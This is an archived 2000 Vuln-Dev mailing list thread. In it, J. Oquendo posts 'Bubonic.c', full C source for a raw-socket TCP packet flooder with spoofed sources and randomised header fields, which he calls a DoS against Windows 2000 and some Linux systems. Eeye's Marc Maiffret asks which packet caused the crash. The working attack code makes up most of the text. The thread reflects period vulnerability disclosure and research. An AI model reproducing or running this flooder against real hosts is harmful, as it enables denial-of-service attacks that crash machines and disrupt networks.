Vulnerability Development mailing list archives
Re: Win2k & Linux DoS
From: "J. Oquendo" <intrusion () ENGINEER COM>
Date: Fri, 25 Aug 2000 17:01:20 -0400
Not sure doing some benchmarking now since everything was set to send random info although 0xc9 as TOS is the culprit somehow. I'll figure it out soon im doing some more rfc reading right now. ------Original Message------ From: "Marc Maiffret" <marc () eeye com> To: "J. Oquendo" <intrusion () ENGINEER COM> Sent: August 25, 2000 11:24:48 AM GMT Subject: RE: Win2k & Linux DoS Do you know what the exact packet you sent was to bluescreen the remote system? Or was it more of a problem with the remote system not being able to handle the amount of packets? Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.349.9062 F.949.349.9538 http://eEye.com | -----Original Message----- | From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of J. | Oquendo | Sent: Friday, August 25, 2000 4:50 PM | To: VULN-DEV () SECURITYFOCUS COM | Subject: Win2k & Linux DoS | | | Greetings everyone. While tampering with random codes when | building a theoretical tool I managed to crash my Windows2000 | laptop by randomizing TCP settings. At first it wasn't a big deal | since MS has gotten me used to seeing error codes with dumps for | just about anything. | | Seems this code which was in no way specified to attack any | specific OS brings the load up to extreme levels and is not | limited to Win2K either. | | Written on an Ultra5 running Linux (zoot) I managed to drive this | load up high after about 3 minutes forcing the machine to lag drastically. | | So in essence I give to you Bubonic.c maybe someone else can | benchmark it and figure out whats going on. | | Error code received during thw WinCrash was: | | STOP 0x00000041 | (0x00001000,0x00001279,0x0000042a,0x00000001) | MUST_SUCCEED_POOL_EMPTY | | -------- SNIP TO CODE -------- | | /* | | * Bubonic.c lame DoS against Windows 2000 machines | * and certain versions of Linux (worked against an Ultra5 | * running Redhat Zoot. Should compile under anything. | * Randomly sends TCP packets with random settings, etc. | | * Brings the load up causing the box to crash with | * error code: | | * STOP 0x00000041 (0x00001000,0x00001279,0x000042A,0x00000001) | * MUST_SUCCEED_POOL_EMPTY | | * CODE RIPPED FROM MY OTHER BGP KILLER WITH SETTINGS TWEAKED. | * WEE MULTICODE... www.antioffline.com/daemonic.c | | * shouts... hrmm fsck it why not... | * #unixgods on the efnet, jhh, iggie, rajak, speye, obecian, | * qwer7y, m3th, god-, tattooman, spikeman, and my wife. | * Can't forget security staff all over the place. | | * Logs for the packets sent at www.antioffline.com/logged | * Windows2K screen shots at www.antioffline.com/loads.html | */ | | | #include <stdio.h> | #include <stdlib.h> | #include <unistd.h> | #include <strings.h> | #include <sys/time.h> | #include <sys/types.h> | #include <sys/socket.h> | | #ifndef __USE_BSD | #define __USE_BSD | | #endif | | #ifndef __FAVOR_BSD | | #define __FAVOR_BSD | | #endif | | #include <netinet/in_systm.h> | #include <netinet/in.h> | #include <netinet/ip.h> | #include <netinet/tcp.h> | #include <arpa/inet.h> | #include <netdb.h> | | #ifdef LINUX | #define FIX(x) htons(x) | | #else | | #define FIX(x) (x) | #endif | | struct ip_hdr { | u_int ip_hl:4, | ip_v:4; | u_char ip_tos; | u_short ip_len; | u_short ip_id; | u_short ip_off; | u_char ip_ttl; | u_char ip_p; | u_short ip_sum; | u_long saddr, daddr; | }; | | struct tcp_hdr { | u_short th_sport; | u_short th_dport; | u_long th_seq; | u_long th_syn; | u_int th_x2:4, | th_off:4; | u_char th_flags; | u_short th_win; | u_short th_sum; | u_short th_urp; | }; | | struct tcpopt_hdr { | u_char type; | u_char len; | u_short value; | }; | | struct pseudo_hdr { | u_long saddr, daddr; | u_char mbz, ptcl; | u_short tcpl; | }; | | struct packet { | struct ip/*_hdr*/ ip; | struct tcphdr tcp; | }; | | struct cksum { | struct pseudo_hdr pseudo; | struct tcphdr tcp; | }; | | struct packet packet; | struct cksum cksum; | struct sockaddr_in s_in; | u_short bgport, bgsize, pps; | u_long radd; | u_long sradd; | int sock; | | void usage(char *progname) | { | fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname); | fprintf(stderr, "Ports are set to send and receive on port 179\n"); | fprintf(stderr, "dst:\tDestination Address\n"); | fprintf(stderr, "src:\tSource Address\n"); | fprintf(stderr, "size:\tSize of packet which should be no | larger than 1024 should allow for xtra header info thru routes\n"); | fprintf(stderr, "num:\tpackets\n\n"); | exit(1); | } | | inline u_short in_cksum(u_short *addr, int len) | { | register int nleft = len; | register u_short *w = addr; | register int sum = 0; | u_short answer = 0; | while (nleft > 1) { | sum += *w++; | nleft -= 2; | } | if (nleft == 1) { | *(u_char *)(&answer) = *(u_char *) w; | sum += answer; | } | sum = (sum >> 16) + (sum & 0xffff); | sum += (sum >> 16); | answer = ~sum; | return(answer); | } | | u_long lookup(char *hostname) | { | struct hostent *hp; | | if ((hp = gethostbyname(hostname)) == NULL) { | fprintf(stderr, "Could not resolve %s fucknut\n", hostname); | exit(1); | } | | return *(u_long *)hp->h_addr; | } | | | void flooder(void) | { | struct timespec ts; | int i; | | | memset(&packet, 0, sizeof(packet)); | | ts.tv_sec = 0; | ts.tv_nsec = 10; | | packet.ip.ip_hl = 5; | packet.ip.ip_v = 4; | packet.ip.ip_p = IPPROTO_TCP; | packet.ip.ip_tos = rand(); | packet.ip.ip_id = radd; | packet.ip.ip_len = FIX(sizeof(packet)); | packet.ip.ip_off = 0; | packet.ip.ip_ttl = 255; | packet.ip.ip_dst.s_addr = radd; | | packet.tcp.th_flags = random(); | packet.tcp.th_win = 65535; | packet.tcp.th_seq = random(); | packet.tcp.th_ack = 0; | packet.tcp.th_off = 0; | packet.tcp.th_urp = random(); | packet.tcp.th_dport = random(); | cksum.pseudo.daddr = sradd; | cksum.pseudo.mbz = 0; | cksum.pseudo.ptcl = IPPROTO_TCP; | cksum.pseudo.tcpl = random(); | | s_in.sin_family = AF_INET; | s_in.sin_addr.s_addr = sradd; | s_in.sin_port = packet.tcp.th_dport; | | for(i=0;;++i) { | if( !(i&0x3FF) ) { | packet.tcp.th_sport = rand(); | cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd; | packet.tcp.th_flags = random(); | packet.tcp.th_ack = rand(); | | } | else { | packet.tcp.th_flags = rand(); | packet.tcp.th_ack = rand(); | } | ++packet.ip.ip_id; | /*++packet.tcp.th_sport*/; | ++packet.tcp.th_seq; | | if (!bgport) | s_in.sin_port = packet.tcp.th_dport = rand(); | | packet.ip.ip_sum = 0; | packet.tcp.th_sum = 0; | | cksum.tcp = packet.tcp; | | packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); | packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); | | if (sendto(sock, &packet, sizeof(packet), 0, (struct | sockaddr *)&s_in, sizeof(s_in)) < 0); | | } | } | | int main(int argc, char *argv[]) | { | int on = 1; | | printf("Bubonic -- sil () antioffline com\n\n"); | | if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { | perror("socket"); | exit(1); | } | | setgid(getgid()); setuid(getuid()); | | if (argc < 4) | usage(argv[0]); | | if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, | sizeof(on)) < 0) | | { | perror("setsockopt"); | exit(1); | | } | | srand((time(NULL) ^ getpid()) + getppid()); | | printf("\nFinding host\n"); fflush(stdout); | | radd = lookup(argv[1]); | bgport = atoi(argv[3]); | bgsize = atoi(argv[4]); | sradd = lookup(argv[2]); | printf("AntiOffline -- Putting the Hero in Heroin\n"); | | flooder(); | | return 0; | } | | ______________________________________________ | FREE Personalized Email at Mail.com | Sign up at http://www.mail.com/?sr=signup | ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup
Current thread:
- Win2k & Linux DoS J. Oquendo (Aug 25)
- <Possible follow-ups>
- Re: Win2k & Linux DoS J. Oquendo (Aug 25)
- Re: Win2k & Linux DoS Vitaly McLain (Aug 26)
- Re: Win2k & Linux DoS Wolfgang Gassner (Aug 28)